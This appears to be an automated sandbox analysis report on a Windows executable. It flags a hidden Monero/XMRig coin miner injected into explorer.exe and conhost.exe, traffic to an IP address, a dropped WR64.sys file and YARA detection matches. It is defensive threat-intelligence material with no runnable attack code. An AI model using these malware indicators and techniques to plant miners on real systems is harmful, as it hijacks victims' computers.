                  Source: unknownTCP traffic detected without corresponding DNS query: 95.143.179.185
                  Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmpString found in binary or memory: l9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
                  Source: AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmpString found in binary or memory: romium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-j
                  Source: sistem.exe, 00000008.00000002.730405844.0000000000C0A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                  System Summary:

                  barindex
                  Malicious sample detected (through community Yara rule)Show sources
                  Source: 27.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 21.2.conhost.exe.224e8d2d308.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 17.2.conhost.exe.2019125ca38.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.2.explorer.exe.140000000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 17.2.conhost.exe.20190d5ca00.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 21.2.conhost.exe.224e882d2d0.7.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 21.2.conhost.exe.224e8d2d308.8.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.2.explorer.exe.140000000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 21.2.conhost.exe.224e882d2d0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 17.2.conhost.exe.20190d5ca00.10.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 17.2.conhost.exe.2019125ca38.11.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001C.00000000.798724965.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001B.00000000.792450012.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001C.00000000.784200823.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001C.00000000.796296289.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001B.00000002.925771817.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001C.00000000.780903437.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001C.00000000.774089554.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001B.00000000.775205927.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001C.00000000.816102106.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001B.00000000.781428125.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001C.00000000.810219805.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001B.00000000.795242519.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001C.00000000.793171664.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001B.00000000.797423384.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001C.00000002.925901333.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001C.00000000.787529097.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001B.00000000.800236371.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001C.00000000.813277906.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001B.00000000.787692374.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001C.00000000.779272197.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001B.00000000.789535375.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001B.00000000.784425223.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001B.00000000.773135705.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001C.00000000.789706786.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001B.00000000.779800649.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001B.00000000.769582384.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  PE file has nameless sectionsShow sources
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: section name:
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: section name:
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: section name:
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: section name:
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: section name:
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: section name:
                  Source: sistem.exe.1.drStatic PE information: section name:
                  Source: sistem.exe.1.drStatic PE information: section name:
                  Source: sistem.exe.1.drStatic PE information: section name:
                  Source: sistem.exe.1.drStatic PE information: section name:
                  Source: sistem.exe.1.drStatic PE information: section name:
                  Source: sistem.exe.1.drStatic PE information: section name:
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_3_026BCCE80_3_026BCCE8
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_3_026BCCE10_3_026BCCE1
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_3_026BCCF70_3_026BCCF7
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_3_026BCCCE0_3_026BCCCE
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_3_026BCCBF0_3_026BCCBF
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_3_026BCD6C0_3_026BCD6C
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_3_026BCD4D0_3_026BCD4D
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_3_026BCD5C0_3_026BCD5C
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_3_026BCD340_3_026BCD34
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_3_026BCD1F0_3_026BCD1F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 1_2_0564EC281_2_0564EC28
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 9_2_0569FA969_2_0569FA96
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 9_2_0569B6F49_2_0569B6F4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 9_2_0569DFC09_2_0569DFC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 9_2_0569DFB09_2_0569DFB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 9_2_097FD2B89_2_097FD2B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 9_2_097F64F49_2_097F64F4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 9_2_097F6E579_2_097F6E57
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 9_2_097F6EA09_2_097F6EA0
                  Source: C:\Windows\System32\conhost.exeCode function: 11_2_000001B0F39CE2D611_2_000001B0F39CE2D6
                  Source: C:\Windows\System32\conhost.exeCode function: 11_2_000001B0F39CDF0611_2_000001B0F39CDF06
                  Source: C:\Windows\System32\conhost.exeCode function: 11_2_000001B0F39CEB6A11_2_000001B0F39CEB6A
                  Source: C:\Windows\System32\conhost.exeCode function: 11_2_000001B0F39CD2D211_2_000001B0F39CD2D2
                  Source: C:\Windows\System32\conhost.exeCode function: 11_2_000001B0F39CE70E11_2_000001B0F39CE70E
                  Source: C:\Windows\System32\conhost.exeCode function: 11_2_00007FFA36265E2211_2_00007FFA36265E22
                  Source: C:\Windows\System32\conhost.exeCode function: 11_2_00007FFA3626507611_2_00007FFA36265076
                  Source: C:\Windows\System32\conhost.exeCode function: 11_2_00007FFA3626044A11_2_00007FFA3626044A
                  Source: C:\Windows\System32\conhost.exeCode function: 17_2_00000201F218DF0617_2_00000201F218DF06
                  Source: C:\Windows\System32\conhost.exeCode function: 17_2_00000201F218E2D617_2_00000201F218E2D6
                  Source: C:\Windows\System32\conhost.exeCode function: 17_2_00000201F218EB6A17_2_00000201F218EB6A
                  Source: C:\Windows\System32\conhost.exeCode function: 17_2_00000201F218E70E17_2_00000201F218E70E
                  Source: C:\Windows\System32\conhost.exeCode function: 17_2_00000201F218D2D217_2_00000201F218D2D2
                  Source: C:\Windows\System32\conhost.exeCode function: 17_2_00007FFA3625033017_2_00007FFA36250330
                  Source: C:\Windows\System32\conhost.exeCode function: 17_2_00007FFA362567BC17_2_00007FFA362567BC
                  Source: C:\Windows\System32\conhost.exeCode function: 17_2_00007FFA36255E2217_2_00007FFA36255E22
                  Source: C:\Windows\System32\conhost.exeCode function: 17_2_00007FFA3625507617_2_00007FFA36255076
                  Source: C:\Windows\System32\conhost.exeCode function: 21_2_00000224D5B4E2D621_2_00000224D5B4E2D6
                  Source: C:\Windows\System32\conhost.exeCode function: 21_2_00000224D5B4DF0621_2_00000224D5B4DF06
                  Source: C:\Windows\System32\conhost.exeCode function: 21_2_00000224D5B4D2D221_2_00000224D5B4D2D2
                  Source: C:\Windows\System32\conhost.exeCode function: 21_2_00000224D5B4E70E21_2_00000224D5B4E70E
                  Source: C:\Windows\System32\conhost.exeCode function: 21_2_00000224D5B4EB6A21_2_00000224D5B4EB6A
                  Source: C:\Windows\System32\conhost.exeCode function: 21_2_00007FFA362666FD21_2_00007FFA362666FD
                  Source: C:\Windows\System32\conhost.exeCode function: 21_2_00007FFA36265E2221_2_00007FFA36265E22
                  Source: C:\Windows\System32\conhost.exeCode function: 21_2_00007FFA3626507621_2_00007FFA36265076
                  Source: C:\Windows\System32\conhost.exeCode function: 21_2_00007FFA3626044A21_2_00007FFA3626044A
                  Source: C:\Windows\System32\conhost.exeCode function: 21_2_00007FFA36268BBE21_2_00007FFA36268BBE
                  Source: C:\Windows\System32\conhost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sysJump to behavior
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                  Source: 27.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 27.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 27.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 21.2.conhost.exe.224e8d2d308.8.raw.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 21.2.conhost.exe.224e8d2d308.8.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 21.2.conhost.exe.224e8d2d308.8.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 28.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
